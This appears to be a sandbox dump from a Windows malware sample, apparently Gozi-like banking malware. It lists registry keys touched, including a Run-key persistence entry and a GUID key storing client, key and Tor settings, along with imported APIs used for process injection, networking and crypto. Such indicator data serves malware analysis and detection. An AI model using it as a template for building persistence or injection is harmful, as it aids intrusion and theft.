HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xb0\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xb0\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.WriteProcessMemory
kernel32.dll.HeapCreate
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
ntdll.dll.RtlNtStatusToDosError
ntdll.dll.NtUnmapViewOfSection
ntdll.dll.NtMapViewOfSection
ntdll.dll.memcpy
ntdll.dll.memset
ntdll.dll.ZwClose
ntdll.dll.NtCreateSection
ntdll.dll.mbstowcs
ntdll.dll.ZwOpenProcessToken
ntdll.dll.ZwOpenProcess
ntdll.dll.ZwQueryInformationToken
ntdll.dll.NtQuerySystemInformation
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.ZwQueryInformationProcess
ntdll.dll.RtlUpcaseUnicodeString
ntdll.dll.RtlUnwind
ntdll.dll.NtQueryVirtualMemory
shlwapi.dll.PathFindExtensionW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindExtensionA
shlwapi.dll.StrRChrA
shlwapi.dll.StrChrA
shlwapi.dll.StrStrIA
shlwapi.dll.StrTrimW
shlwapi.dll.StrChrW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathCombineW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiEnumDeviceInfo
setupapi.dll.SetupDiGetDeviceRegistryPropertyA
setupapi.dll.SetupDiGetClassDevsA
kernel32.dll.SetEvent
kernel32.dll.Sleep
kernel32.dll.GetExitCodeProcess
kernel32.dll.CreateProcessA
kernel32.dll.lstrlenW
kernel32.dll.GetLastError
kernel32.dll.GetProcAddress
kernel32.dll.ResetEvent
kernel32.dll.LoadLibraryA
kernel32.dll.lstrcmpiW
kernel32.dll.lstrcatW
kernel32.dll.DeleteFileW
kernel32.dll.CreateWaitableTimerA
kernel32.dll.SetFileAttributesW
kernel32.dll.SetWaitableTimer
kernel32.dll.GetModuleHandleA
kernel32.dll.HeapDestroy
kernel32.dll.GetCommandLineW
kernel32.dll.ExitProcess
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.WaitForSingleObject
kernel32.dll.CreateFileA
kernel32.dll.CreateEventA
kernel32.dll.GetVersion
kernel32.dll.lstrcmpA
kernel32.dll.GetTempPathA
kernel32.dll.GetTempFileNameA
kernel32.dll.CreateDirectoryA
kernel32.dll.GetFileSize
kernel32.dll.FreeLibrary
kernel32.dll.lstrcpynA
kernel32.dll.GetFileTime
kernel32.dll.FindNextFileA
kernel32.dll.FindClose
kernel32.dll.FindFirstFileA
kernel32.dll.CompareFileTime
kernel32.dll.GetModuleFileNameA
kernel32.dll.lstrcmpiA
kernel32.dll.SetLastError
kernel32.dll.GetModuleHandleW
kernel32.dll.LoadLibraryW
kernel32.dll.TerminateThread
kernel32.dll.GetVersionExW
kernel32.dll.VirtualAlloc
kernel32.dll.IsWow64Process
kernel32.dll.GetCurrentProcessId
kernel32.dll.CreateThread
kernel32.dll.OpenProcess
kernel32.dll.VirtualProtectEx
kernel32.dll.SuspendThread
kernel32.dll.ResumeThread
kernel32.dll.GetLongPathNameW
kernel32.dll.GetModuleFileNameW
kernel32.dll.lstrlenA
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.lstrcatA
kernel32.dll.lstrcpyA
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.LocalFree
kernel32.dll.SetEndOfFile
kernel32.dll.CreateDirectoryW
kernel32.dll.WriteFile
kernel32.dll.CreateFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.lstrcpyW
kernel32.dll.SetFilePointer
kernel32.dll.VirtualFree
user32.dll.DefWindowProcW
user32.dll.SendMessageW
user32.dll.GetSystemMetrics
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.SetClassLongW
user32.dll.SystemParametersInfoW
user32.dll.GetAncestor
user32.dll.GetWindowLongW
user32.dll.RegisterClassExW
user32.dll.GetForegroundWindow
user32.dll.TranslateMessage
user32.dll.GetMessageW
user32.dll.keybd_event
user32.dll.DestroyWindow
user32.dll.wsprintfW
user32.dll.wsprintfA
user32.dll.DispatchMessageW
user32.dll.GetCursorInfo
advapi32.dll.OpenProcessToken
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegOpenKeyW
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.RegSetValueExW
advapi32.dll.RegOpenKeyA
advapi32.dll.RegCreateKeyA
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorA
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegQueryValueExW
advapi32.dll.RegSetValueExA
advapi32.dll.RegQueryValueExA
shell32.dll.#92
shell32.dll.ShellExecuteW
shell32.dll.ShellExecuteExW
ole32.dll.CoUninitialize
ole32.dll.CoInitializeEx
wintrust.dll.WinVerifyTrust
user32.dll.FindWindowA
user32.dll.GetWindowThreadProcessId
kernel32.dll.Wow64EnableWow64FsRedirection
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
oleaut32.dll.#9
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ntdll.dll.ZwWow64QueryInformationProcess64
ntdll.dll.ZwWow64ReadVirtualMemory64
ntdll.dll.strcpy
ntdll.dll.NtResumeProcess
ntdll.dll.NtSuspendProcess
ntdll.dll._snprintf
ntdll.dll._wcsupr
ntdll.dll._strupr
ntdll.dll.memmove
ntdll.dll.wcscpy
ntdll.dll.ZwQueryKey
ntdll.dll.wcstombs
ntdll.dll.RtlImageNtHeader
ntdll.dll.RtlAdjustPrivilege
ntdll.dll.sprintf
ntdll.dll.wcscat
ntdll.dll.__C_specific_handler
ntdll.dll.__chkstk
kernel32.dll.GetComputerNameW
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.QueueUserWorkItem
kernel32.dll.SystemTimeToFileTime
kernel32.dll.GetLocalTime
kernel32.dll.RemoveDirectoryA
kernel32.dll.DeleteFileA
kernel32.dll.HeapReAlloc
kernel32.dll.GetCurrentThread
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.CopyFileW
kernel32.dll.GetCurrentThreadId
kernel32.dll.DuplicateHandle
kernel32.dll.SwitchToThread
kernel32.dll.MapViewOfFile
kernel32.dll.UnmapViewOfFile
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.OpenWaitableTimerA
kernel32.dll.OpenMutexA
kernel32.dll.WaitForMultipleObjects
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetVersionExA
kernel32.dll.InitializeCriticalSection
kernel32.dll.UnregisterWait
kernel32.dll.TlsGetValue
kernel32.dll.LoadLibraryExW
kernel32.dll.TlsSetValue
kernel32.dll.RegisterWaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.TlsAlloc
kernel32.dll.GetDriveTypeW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.WideCharToMultiByte
kernel32.dll.CreateFileMappingA
kernel32.dll.OpenFileMappingA
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.QueueUserAPC
kernel32.dll.OpenThread
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.CallNamedPipeA
kernel32.dll.WaitNamedPipeA
kernel32.dll.ConnectNamedPipe
kernel32.dll.GetOverlappedResult
kernel32.dll.DisconnectNamedPipe
kernel32.dll.CreateNamedPipeA
kernel32.dll.CancelIo
kernel32.dll.GetSystemTime
kernel32.dll.RemoveVectoredExceptionHandler
kernel32.dll.SleepEx
kernel32.dll.AddVectoredExceptionHandler
kernel32.dll.OpenEventA
kernel32.dll.LocalAlloc
kernel32.dll.RaiseException
kernel32.dll.FileTimeToSystemTime
kernel32.dll.DeleteCriticalSection
kernel32.dll.RemoveDirectoryW
kernel32.dll.FindNextFileW
kernel32.dll.FindFirstFileW
kernel32.dll.SetFilePointerEx
kernel32.dll.GetFileAttributesW
oleaut32.dll.#8
oleaut32.dll.#2
oleaut32.dll.#6
advapi32.dll.GetUserNameA
psapi.dll.EnumProcessModules
shlwapi.dll.StrToIntExA
shlwapi.dll.StrTrimA
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpQueryOption
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
secur32.dll.FreeContextBuffer
ncrypt.dll.SslOpenProvider
ncrypt.dll.GetSChannelInterface
bcryptprimitives.dll.GetHashInterface
ncrypt.dll.SslIncrementProviderReferenceCount
ncrypt.dll.SslImportKey
bcryptprimitives.dll.GetCipherInterface
ncrypt.dll.SslLookupCipherSuiteInfo
user32.dll.LoadStringW
ncrypt.dll.BCryptOpenAlgorithmProvider
ncrypt.dll.BCryptGetProperty
ncrypt.dll.BCryptCreateHash
ncrypt.dll.BCryptHashData
ncrypt.dll.BCryptFinishHash
ncrypt.dll.BCryptDestroyHash
crypt32.dll.CertGetCertificateChain
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
sechost.dll.ConvertStringSidToSidW
userenv.dll.RegisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceConfigW
cryptnet.dll.CryptGetObjectUrl
cryptnet.dll.I_CryptNetGetConnectivity
sensapi.dll.IsNetworkAlive
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall3
cryptnet.dll.CryptRetrieveObjectByUrlW
setupapi.dll.SetupIterateCabinetW
cabinet.dll.#20
cabinet.dll.#22
devrtl.dll.DevRtlGetThreadLogToken
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegCloseKey
cabinet.dll.#23
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptSetHashParam
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptVerifySignatureA
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptHashData
sechost.dll.QueryServiceConfigA
sechost.dll.QueryServiceStatus
rpcrt4.dll.RpcStringBindingComposeA
rpcrt4.dll.RpcBindingFromStringBindingA
rpcrt4.dll.RpcEpResolveBinding
sechost.dll.LookupAccountSidLocalW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcStringFreeA
rpcrt4.dll.RpcBindingFree
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpCrackUrl
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
cryptbase.dll.SystemFunction036
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoTaskMemAlloc
ole32.dll.StringFromIID
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
ole32.dll.CoTaskMemFree
nsi.dll.NsiFreeTable
oleaut32.dll.#500
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpTimeFromSystemTime
winhttp.dll.WinHttpQueryHeaders
shlwapi.dll.StrStrIW
winhttp.dll.WinHttpQueryDataAvailable
winhttp.dll.WinHttpReadData
winhttp.dll.WinHttpCloseHandle
cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo
bcryptprimitives.dll.GetAsymmetricEncryptionInterface
ncrypt.dll.BCryptImportKeyPair
ncrypt.dll.BCryptVerifySignature
ncrypt.dll.BCryptDestroyKey
winhttp.dll.WinHttpSetStatusCallback
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
ncrypt.dll.SslEncryptPacket
ncrypt.dll.SslDecryptPacket
ole32.dll.CreateStreamOnHGlobal
crypt32.dll.CertFreeCertificateContext
user32.dll.GetShellWindow
ntdll.dll.RtlExitUserThread
